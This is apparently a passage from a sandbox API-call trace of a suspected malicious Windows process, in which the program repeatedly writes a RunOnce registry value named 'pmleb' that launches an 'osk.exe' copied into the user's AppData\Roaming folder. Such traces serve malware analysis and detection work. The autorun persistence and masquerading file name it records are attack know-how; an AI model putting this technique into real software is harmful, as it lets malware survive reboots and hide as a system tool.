[0095.775] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.775] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.775] RegCloseKey (hKey=0x280) returned 0x0 [0095.775] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.775] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.775] SetTimer (hWnd=0x20280, nIDEvent=0x226f, uElapse=0xa, lpTimerFunc=0x0) returned 0x226f [0095.775] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.790] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.790] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.790] KillTimer (hWnd=0x20280, uIDEvent=0x226f) returned 1 [0095.790] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.791] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.791] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.791] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.791] RegCloseKey (hKey=0x280) returned 0x0 [0095.791] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.792] SetTimer (hWnd=0x20280, nIDEvent=0x2270, uElapse=0xa, lpTimerFunc=0x0) returned 0x2270 [0095.792] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.805] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.805] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.805] KillTimer (hWnd=0x20280, uIDEvent=0x2270) returned 1 [0095.806] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.806] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.806] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.806] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.807] RegCloseKey (hKey=0x280) returned 0x0 [0095.807] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.807] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.807] SetTimer (hWnd=0x20280, nIDEvent=0x2271, uElapse=0xa, lpTimerFunc=0x0) returned 0x2271 [0095.807] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.821] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.821] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.821] KillTimer (hWnd=0x20280, uIDEvent=0x2271) returned 1 [0095.821] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.822] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.822] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.822] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.822] RegCloseKey (hKey=0x280) returned 0x0 [0095.822] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.822] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.822] SetTimer (hWnd=0x20280, nIDEvent=0x2272, uElapse=0xa, lpTimerFunc=0x0) returned 0x2272 [0095.823] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.839] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.839] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.840] KillTimer (hWnd=0x20280, uIDEvent=0x2272) returned 1 [0095.840] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.840] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.840] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.841] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.841] RegCloseKey (hKey=0x280) returned 0x0 [0095.841] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.841] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.841] SetTimer (hWnd=0x20280, nIDEvent=0x2273, uElapse=0xa, lpTimerFunc=0x0) returned 0x2273 [0095.841] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.852] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.852] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.853] KillTimer (hWnd=0x20280, uIDEvent=0x2273) returned 1 [0095.853] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.853] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.853] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.854] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.854] RegCloseKey (hKey=0x280) returned 0x0 [0095.854] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.854] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.854] SetTimer (hWnd=0x20280, nIDEvent=0x2274, uElapse=0xa, lpTimerFunc=0x0) returned 0x2274 [0095.854] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.868] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.868] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.868] KillTimer (hWnd=0x20280, uIDEvent=0x2274) returned 1 [0095.868] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.869] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.869] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.869] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.869] RegCloseKey (hKey=0x280) returned 0x0 [0095.869] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.869] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.869] SetTimer (hWnd=0x20280, nIDEvent=0x2275, uElapse=0xa, lpTimerFunc=0x0) returned 0x2275 [0095.869] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.884] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.884] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.884] KillTimer (hWnd=0x20280, uIDEvent=0x2275) returned 1 [0095.885] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.885] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.885] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.885] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.885] RegCloseKey (hKey=0x280) returned 0x0 [0095.886] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.886] SetTimer (hWnd=0x20280, nIDEvent=0x2276, uElapse=0xa, lpTimerFunc=0x0) returned 0x2276 [0095.886] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.899] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.899] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.899] KillTimer (hWnd=0x20280, uIDEvent=0x2276) returned 1 [0095.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.899] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.900] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.900] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.900] RegCloseKey (hKey=0x280) returned 0x0 [0095.900] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.900] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.900] SetTimer (hWnd=0x20280, nIDEvent=0x2277, uElapse=0xa, lpTimerFunc=0x0) returned 0x2277 [0095.900] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.915] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.915] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.915] KillTimer (hWnd=0x20280, uIDEvent=0x2277) returned 1 [0095.915] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.916] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.916] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.916] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.916] RegCloseKey (hKey=0x280) returned 0x0 [0095.916] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.916] SetTimer (hWnd=0x20280, nIDEvent=0x2278, uElapse=0xa, lpTimerFunc=0x0) returned 0x2278 [0095.916] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.930] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.930] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.930] KillTimer (hWnd=0x20280, uIDEvent=0x2278) returned 1 [0095.930] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.931] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.931] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.931] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.931] RegCloseKey (hKey=0x280) returned 0x0 [0095.931] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.931] SetTimer (hWnd=0x20280, nIDEvent=0x2279, uElapse=0xa, lpTimerFunc=0x0) returned 0x2279 [0095.931] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.945] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.945] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.946] KillTimer (hWnd=0x20280, uIDEvent=0x2279) returned 1 [0095.946] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.946] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.947] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.947] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.947] RegCloseKey (hKey=0x280) returned 0x0 [0095.947] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.947] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.947] SetTimer (hWnd=0x20280, nIDEvent=0x227a, uElapse=0xa, lpTimerFunc=0x0) returned 0x227a [0095.947] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.962] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.962] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.962] KillTimer (hWnd=0x20280, uIDEvent=0x227a) returned 1 [0095.962] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.963] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.963] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.963] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.963] RegCloseKey (hKey=0x280) returned 0x0 [0095.963] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.963] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.963] SetTimer (hWnd=0x20280, nIDEvent=0x227b, uElapse=0xa, lpTimerFunc=0x0) returned 0x227b [0095.963] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.977] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.977] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.977] KillTimer (hWnd=0x20280, uIDEvent=0x227b) returned 1 [0095.977] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.978] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.978] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.978] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.978] RegCloseKey (hKey=0x280) returned 0x0 [0095.978] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.978] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.978] SetTimer (hWnd=0x20280, nIDEvent=0x227c, uElapse=0xa, lpTimerFunc=0x0) returned 0x227c [0095.978] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0095.993] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0095.993] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0095.993] KillTimer (hWnd=0x20280, uIDEvent=0x227c) returned 1 [0095.993] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.994] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0095.994] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0095.994] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0095.994] RegCloseKey (hKey=0x280) returned 0x0 [0095.994] IUnknown:Release (This=0x7a9740) returned 0x1 [0095.994] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0095.994] SetTimer (hWnd=0x20280, nIDEvent=0x227d, uElapse=0xa, lpTimerFunc=0x0) returned 0x227d [0095.994] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.008] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.008] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.008] KillTimer (hWnd=0x20280, uIDEvent=0x227d) returned 1 [0096.008] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.009] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.009] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.009] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.009] RegCloseKey (hKey=0x280) returned 0x0 [0096.009] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.010] SetTimer (hWnd=0x20280, nIDEvent=0x227e, uElapse=0xa, lpTimerFunc=0x0) returned 0x227e [0096.010] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.023] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.023] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.024] KillTimer (hWnd=0x20280, uIDEvent=0x227e) returned 1 [0096.024] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.024] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.024] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.025] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.025] RegCloseKey (hKey=0x280) returned 0x0 [0096.025] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.025] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.025] SetTimer (hWnd=0x20280, nIDEvent=0x227f, uElapse=0xa, lpTimerFunc=0x0) returned 0x227f [0096.025] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.041] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.041] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.041] KillTimer (hWnd=0x20280, uIDEvent=0x227f) returned 1 [0096.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.042] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.042] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.042] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.042] RegCloseKey (hKey=0x280) returned 0x0 [0096.042] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.043] SetTimer (hWnd=0x20280, nIDEvent=0x2280, uElapse=0xa, lpTimerFunc=0x0) returned 0x2280 [0096.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.055] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.055] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.055] KillTimer (hWnd=0x20280, uIDEvent=0x2280) returned 1 [0096.055] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.056] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.056] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.056] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.056] RegCloseKey (hKey=0x280) returned 0x0 [0096.056] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.056] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.056] 